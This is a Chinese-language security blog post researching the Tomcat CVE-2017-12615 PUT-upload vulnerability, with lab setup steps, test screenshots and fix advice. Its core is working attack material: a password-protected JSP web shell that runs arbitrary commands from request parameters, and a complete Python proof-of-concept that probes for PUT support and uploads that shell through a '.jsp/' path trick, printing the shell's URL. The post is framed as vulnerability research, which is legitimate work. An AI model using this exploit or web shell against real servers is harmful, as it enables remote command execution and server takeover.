<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Tomcat," />










<meta name="description" content="Tomcat CVE-2017-12615 远程代码执行漏洞的简单研究。">
<meta name="keywords" content="Tomcat">
<meta property="og:type" content="article">
<meta property="og:title" content="Tomcat CVE-2017-12615 远程代码执行漏洞">
<meta property="og:url" content="http://yoursite.com/2017/09/21/Tomcat/index.html">
<meta property="og:site_name" content="Sec-note">
<meta property="og:description" content="Tomcat CVE-2017-12615 远程代码执行漏洞的简单研究。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/6879452.jpg">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/49583998.jpg">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/71751989.jpg">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/68481146.jpg">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/13765510.jpg">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/96541990.jpg">
<meta property="og:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/13222151.jpg">
<meta property="og:updated_time" content="2018-03-30T11:17:34.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Tomcat CVE-2017-12615 远程代码执行漏洞">
<meta name="twitter:description" content="Tomcat CVE-2017-12615 远程代码执行漏洞的简单研究。">
<meta name="twitter:image" content="http://opmi2ydgh.bkt.clouddn.com//17-9-21/6879452.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/09/21/Tomcat/"/>





  <title>Tomcat CVE-2017-12615 远程代码执行漏洞 | Sec-note</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sec-note</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/09/21/Tomcat/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Sec-note">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sec-note">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Tomcat CVE-2017-12615 远程代码执行漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-09-21T18:13:23+08:00">
                2017-09-21
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全研究/" itemprop="url" rel="index">
                    <span itemprop="name">安全研究</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Tomcat CVE-2017-12615 远程代码执行漏洞的简单研究。</p>
<a id="more"></a>
<p><strong>下载安装jdk</strong></p>
<pre><code>http://js.9553.com/soft/jdk-8u66-windows-i586-20151102.rar
</code></pre><p><strong>环境配置</strong></p>
<p>新建2个变量，编辑一个变量，分别填入一下信息</p>
<pre><code>系统变量里面

新建：

变量名:JAVA_HOME

变量值:你的JDK安装目录\jdk1.7.0



变量名:CLASSPATH

变量值:.;%JAVA_HOME%\lib;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;%TOMCAT_HOME%\BIN

（注意最前面有个.号）



编辑：

变量名:Path

变量值:%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;

 (将此处的字符串粘帖到变量值的最前面)
</code></pre><p>在开始运行输入CMD，在命令行里分别输入java; javac; java -version，显示信息，说明java环境配置成功。</p>
<p><strong>tomcat</strong></p>
<pre><code>http://tomcat.apache.org/download-70.cgi
</code></pre><blockquote>
<p>zip、tar.gz和Windows Service Installer三种安装包，其中：<br>Zip是Windows下的免安装版本，只需要解压后做一定的手动配置就可以正常的使用；<br>tar.gz是Linux下的安装包；<br>Windows Service Installer很明显就是Windows下的Install程序，双击后就可以自动安装了</p>
</blockquote>
<p>变量名:TOMCAT_HOME</p>
<p>变量值:你的TOMCAT所在目录<br>如：E:\apache-tomcat-7.0.26</p>
<p><strong>tomcat配置</strong></p>
<p>修改默认访问端口</p>
<pre><code>E:\tomcat\conf\server.xml
</code></pre><p>修改为9090</p>
<pre><code>&lt;Connector port=&quot;9090&quot; protocol=&quot;HTTP/1.1&quot;
          connectionTimeout=&quot;20000&quot;
          redirectPort=&quot;8443&quot; /&gt;
</code></pre><hr>
<h4 id="Tomcat-代码执行漏洞分析"><a href="#Tomcat-代码执行漏洞分析" class="headerlink" title="Tomcat 代码执行漏洞分析"></a>Tomcat 代码执行漏洞分析</h4><p>修改配置文件 <code>E:\tomcat\conf\server.xml</code></p>
<p>添加以下内容</p>
<pre><code>&lt;init-param&gt;
        &lt;param-name&gt;readonly&lt;/param-name&gt;
        &lt;param-value&gt;false&lt;/param-value&gt;
    &lt;/init-param&gt;
</code></pre><h4 id="漏洞利用条件"><a href="#漏洞利用条件" class="headerlink" title="漏洞利用条件"></a>漏洞利用条件</h4><p>CVE-2017-12615 需要将readonly初始化参数由默认值设置为false。但是Tomcat7.x版本中的<code>web.xml</code>配置文件中没有<code>readonly</code>参数，需要手工添加，默认配置不受此漏洞影响。</p>
<p><strong>版本–7.0.81</strong></p>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/6879452.jpg" alt=""></p>
<p>上传的时候出现，403禁止。。</p>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/49583998.jpg" alt=""></p>
<p><strong>版本–7.0.79</strong></p>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/71751989.jpg" alt=""></p>
<ul>
<li>put请求，上传内容</li>
</ul>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/68481146.jpg" alt=""></p>
<ul>
<li>访问</li>
</ul>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/13765510.jpg" alt=""></p>
<ul>
<li><p>上传一木马</p>
<pre><code>&lt;%
if(&quot;023&quot;.equals(request.getParameter(&quot;pwd&quot;))){
    java.io.InputStream in = 
        Runtime.getRuntime().exec(request.getParameter(&quot;i&quot;)).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print(&quot;&lt;pre&gt;&quot;);
        while((a=in.read(b)) !=1){
                out.println(new String(b));
        }
        out.print(&quot;&lt;/pre&gt;&quot;);
}
%&gt;
</code></pre></li>
</ul>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/96541990.jpg" alt=""></p>
<h5 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h5><p><a href="https://github.com/fupinglee/MyPython/blob/92394ff98b02c1d81361ce2d5ae9f53f527a2a6b/exploit/CVE-2017-12615/CVE-2017-12615.py" target="_blank" rel="noopener">CVE-2017-12615.py</a></p>
<p>使用了<code>httplib</code>模块。对其中的几句代码不是很理解，单独测试一下。</p>
<pre><code>&gt;&gt;&gt; conn = httplib.HTTPConnection(&apos;192.168.86.194&apos;,9090)
&gt;&gt;&gt; conn.request(method=&apos;OPTIONS&apos;,url=&apos;/fffzz&apos;)
&gt;&gt;&gt; a = conn.getresponse()
&gt;&gt;&gt; a
&lt;httplib.HTTPResponse instance at 0x0000000002612188&gt;
&gt;&gt;&gt; a.getheaders()
[(&apos;date&apos;, &apos;Thu, 21 Sep 2017 08:39:26 GMT&apos;), (&apos;content-length&apos;, &apos;0&apos;), (&apos;allow&apos;, &apos;
GET, HEAD, POST, PUT, DELETE, OPTIONS&apos;), (&apos;server&apos;, &apos;Apache-Coyote/1.1&apos;)]
</code></pre><p><code>OPTIONS</code></p>
<blockquote>
<p>这个方法会请求服务器返回该资源所支持的所有HTTP请求方法，该方法会用’*’来代替资源名称，向服务器发送OPTIONS请求，可以测试服务器功能是否正常。</p>
</blockquote>
<p><img src="http://opmi2ydgh.bkt.clouddn.com//17-9-21/13222151.jpg" alt=""></p>
<pre><code>#!/usr/bin/python
# -*- coding:utf-8 -*-
#__author__=&quot;浮萍&quot;

import httplib
import sys
import time

#恶意代码
body = &apos;&apos;&apos;&lt;%@ page language=&quot;java&quot; import=&quot;java.util.*,java.io.*&quot; pageEncoding=&quot;UTF-8&quot;%&gt;&lt;%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+&quot;\\n&quot;);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%&gt;&lt;%if(&quot;023&quot;.equals(request.getParameter(&quot;pwd&quot;))&amp;&amp;!&quot;&quot;.equals(request.getParameter(&quot;cmd&quot;))){out.println(&quot;&lt;pre&gt;&quot;+excuteCmd(request.getParameter(&quot;cmd&quot;))+&quot;&lt;/pre&gt;&quot;);}else{out.println(&quot;:-)&quot;);}%&gt;&apos;&apos;&apos;

try:
    conn = httplib.HTTPConnection(sys.argv[1])  # 第一个参数为目标地址
    conn.request(method=&apos;OPTIONS&apos;,url=&apos;/ffffzz&apos;)
    headers = dict(conn.getresponse().getheaders())
    if &apos;allow&apos; in headers and headers[&apos;allow&apos;].find(&apos;PUT&apos;) &gt; 0:
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = &quot;/&quot; + str(int(time.time())) + &apos;.jsp/&apos;
        #url = &quot;/&quot; + str(int(time.time())) + &apos;.jsp::$DATA&apos;
        conn.request(method=&apos;PUT&apos;,url=url,body=body)
        res = conn.getresponse()
        if res.status == 201:
            print &apos;shell:&apos;, &apos;http://&apos; + sys.argv[1] + url[:-1]
        elif res.status == &apos;204&apos;:
            print &apos;file exists&apos;
        else:
            print &apos;error&apos;
        conn.close()

    else:
        print &apos;Server not vulnerable&apos;

except Exception,e:
    print &apos;Error:&apos;,e
</code></pre><h5 id="修复建议"><a href="#修复建议" class="headerlink" title="修复建议"></a>修复建议</h5><ol>
<li>升级到Apache Tomcat 最新的版本</li>
<li>将<code>conf\web.xml</code>中的`<init-param><pre><code>    &lt;param-name&gt;readonly&lt;/param-name&gt;
    &lt;param-value&gt;true&lt;/param-value&gt;
&lt;/init-param&gt;`
</code></pre></init-param></li>
</ol>
<p>设置为<code>true</code>，其实默认的就是<code>true</code>。</p>
<h5 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h5><p><a href="https://tomcat.apache.org/security-7.html" target="_blank" rel="noopener">https://tomcat.apache.org/security-7.html</a></p>
<p><a href="https://mp.weixin.qq.com/s/-dgcKKCjT8C2yDxMOXDyLA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/-dgcKKCjT8C2yDxMOXDyLA</a></p>
<p><a href="https://www.secfree.com/article-399.html" target="_blank" rel="noopener">https://www.secfree.com/article-399.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Tomcat/" rel="tag"># Tomcat</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/19/python_class/" rel="next" title="Python 类">
                <i class="fa fa-chevron-left"></i> Python 类
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/09/26/PHP-note/" rel="prev" title="PHP 基础知识">
                PHP 基础知识 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Sec-note</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">60</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/sie504" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Tomcat-代码执行漏洞分析"><span class="nav-number">1.</span> <span class="nav-text">Tomcat 代码执行漏洞分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞利用条件"><span class="nav-number">2.</span> <span class="nav-text">漏洞利用条件</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#POC"><span class="nav-number">2.1.</span> <span class="nav-text">POC</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#修复建议"><span class="nav-number">2.2.</span> <span class="nav-text">修复建议</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#参考"><span class="nav-number">2.3.</span> <span class="nav-text">参考</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sec-note</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
